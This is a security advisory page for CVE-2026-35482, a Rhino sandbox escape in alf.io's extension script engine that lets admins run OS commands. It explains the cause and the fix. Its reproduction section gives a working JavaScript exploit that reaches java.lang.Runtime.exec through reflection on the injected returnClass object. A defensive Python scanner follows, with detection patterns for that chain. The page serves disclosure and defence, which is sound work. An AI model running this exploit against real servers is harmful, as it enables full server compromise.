VYPR
High severity · 8.0 · NVD Advisory · Published Jun 2, 2026

CVE-2026-35482


Description

CVE-2026-35482: Alf.io extension script engine sandbox escape allows authenticated admins to run OS commands.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.


Vulnerability

Prior to version 2.0-M5-2606, alf.io's extension script engine contained a sandbox escape vulnerability. The engine was intended to execute JavaScript in a sandboxed Rhino environment, but an unguarded injected Java object (returnClass), combined with an incomplete AST blocklist, allowed a full sandbox escape via Java reflection, bypassing the intended restrictions. The vulnerability is triggered when an extension script is saved via POST /admin/api/extensions [1].

Exploitation

An authenticated administrator can exploit this vulnerability by saving a malicious extension script. The injected code executes when a specific event fires, such as INVOICE_GENERATION on the first ticket purchase with invoicing enabled. The attacker needs administrator privileges and the ability to upload extension scripts. No further user interaction is required after the script is saved [1].

Impact

Successful exploitation allows an authenticated administrator to execute arbitrary operating system commands on the server. This provides a complete compromise of the server hosting the alf.io application, enabling attackers to gain full control over the system and potentially access sensitive data or disrupt services [1].

Mitigation

Version 2.0-M5-2606 addresses this vulnerability. Users are advised to upgrade to this version or later. No workarounds are specified in the available references, and the system is not listed as end-of-life or on the KEV catalog [1].

AI Insight generated on Jun 2, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

1

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The extension script engine improperly injects an unrestricted Java Class object, allowing Java reflection to bypass sandbox restrictions."

Attack vector

An authenticated administrator can trigger this vulnerability by uploading a malicious extension script to the `/admin/api/extensions` endpoint. The script contains JavaScript that uses the injected `returnClass` object to access `java.lang.Runtime` via reflection. This allows arbitrary operating system commands to be executed on the server when the script's associated event fires, such as `INVOICE_GENERATION` [ref_id=1].

Affected code

The vulnerability lies within the alf.io extension script engine, specifically in the `ScriptingExecutionService.executeScriptFinally()` method where the `returnClass` object is injected into the script scope. This injection allows for the bypass of static AST validation and the `JavaClassInterop` whitelist [ref_id=1].

What the fix does

Version 2.0-M5-2606 addresses the vulnerability by removing the unguarded injection of the `returnClass` object into the script scope. This prevents attackers from using Java reflection to bypass the sandbox and execute arbitrary commands, as the necessary entry point for reflection is no longer available [ref_id=1].

Preconditions

  • auth: The attacker must have administrator privileges.

Reproduction

Paste the following into the alf.io extension editor (or POST it to /admin/api/extensions):

```javascript
function getScriptMetadata() {
  return {
    id: 'rce-validate',
    displayName: 'RCE Validate',
    version: 0,
    async: false,
    events: ['TICKET_ASSIGNED', 'INVOICE_GENERATION']
  };
}

function executeScript(scriptEvent) {
  var rtClass = returnClass.forName('java.lang.Runtime');
  var strClass = returnClass.forName('java.lang.String');
  var runtime = rtClass.getMethod('getRuntime').invoke(null);
  var proc = rtClass.getMethod('exec', strClass).invoke(runtime, 'id');
  var bytes = proc.getInputStream().readAllBytes();
  var output = '';
  for (var i = 0; i < bytes.length; i++) {
    output += String.fromCharCode(bytes[i] & 0xFF);
  }
  console.log(output);
  return { invoiceNumber: output };
}
```

The `id` command output will appear as the generated invoice number in the UI and in the extension log (GET /admin/api/extensions/log). Any shell command can be substituted [ref_id=1].
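For defenders who cannot upgrade immediately, the practical check is to audit the extension scripts already stored in an instance for the reflection chain described above (the injected `returnClass` object, `Class.forName()`, `java.lang.Runtime` / `ProcessBuilder`, `getMethod()` / `invoke()`). The scanner below is an added example written for this page; it is not VYPR's or alf.io's code. It assumes you have already exported each extension's script source as text (how you obtain it is outside the example), and the indicator weights, the threshold and the two sample scripts are constructed for illustration.

```python
"""Audit exported alf.io extension scripts for the reflection-based sandbox
escape pattern behind CVE-2026-35482. Added example, not alf.io code."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Indicators of Java reflection reaching out of the Rhino sandbox. The names
# come from the advisory's reproduction; the weights are this example's own
# assumption, not an alf.io or NVD scoring scheme.
INDICATORS = [
    (r"\breturnClass\b", "use of the injected returnClass Class object", 3),
    (r"\.forName\s*\(", "Class.forName() lookup", 2),
    (r"java\.lang\.Runtime|java\.lang\.ProcessBuilder", "process-spawning class name", 3),
    (r"\.getMethod\s*\(", "reflective method lookup", 1),
    (r"\.invoke\s*\(", "reflective invocation", 1),
    (r"['\"]exec['\"]", "'exec' method name passed as a string", 2),
]


@dataclass
class Finding:
    line: int      # 1-based line number in the script source
    text: str      # the offending line, stripped
    reason: str    # which indicator matched
    weight: int    # contribution to the risk score


def scan_script(source: str) -> list[Finding]:
    """Return one Finding per (line, indicator) match, in source order."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for pattern, reason, weight in INDICATORS:
            if re.search(pattern, line):
                findings.append(Finding(lineno, line.strip(), reason, weight))
    return findings


def risk_score(findings: list[Finding]) -> int:
    return sum(f.weight for f in findings)


def is_suspicious(source: str, threshold: int = 4) -> bool:
    """A single strong indicator plus any other one crosses the threshold;
    the value 4 is an assumption chosen so that a lone .invoke() does not."""
    return risk_score(scan_script(source)) >= threshold


def registered_events(source: str) -> list[str]:
    """Pull the event names out of getScriptMetadata()'s events array, so a
    reviewer knows which event (e.g. INVOICE_GENERATION) would run the script."""
    match = re.search(r"events\s*:\s*\[([^\]]*)\]", source)
    if not match:
        return []
    return re.findall(r"['\"]([A-Z_]+)['\"]", match.group(1))


# Constructed sample scripts (not real alf.io extensions).
BENIGN_SCRIPT = """\
function getScriptMetadata() {
  return { id: 'welcome-log', displayName: 'Welcome log', version: 1, async: false, events: ['TICKET_ASSIGNED'] };
}
function executeScript(scriptEvent) {
  console.log('ticket assigned');
  return null;
}
"""

SUSPICIOUS_SCRIPT = """\
function getScriptMetadata() {
  return { id: 'report', displayName: 'Report', version: 0, async: false, events: ['INVOICE_GENERATION'] };
}
function executeScript(scriptEvent) {
  var rtClass = returnClass.forName('java.lang.Runtime');
  var runtime = rtClass.getMethod('getRuntime').invoke(null);
  return { invoiceNumber: 'x' };
}
"""


if __name__ == "__main__":
    for name, src in (("benign", BENIGN_SCRIPT), ("suspicious", SUSPICIOUS_SCRIPT)):
        findings = scan_script(src)
        print(f"{name}: events={registered_events(src)} score={risk_score(findings)} "
              f"suspicious={is_suspicious(src)}")
        for f in findings:
            print(f"  line {f.line}: {f.reason}: {f.text}")
```

Run it against every exported script; anything flagged is worth reading by hand, because the pattern matching is deliberately coarse (a script can reach the same classes through other spellings) and is meant to prioritise review, not to replace the upgrade to 2.0-M5-2606.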

Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

1

News mentions

0

No linked articles in our index yet.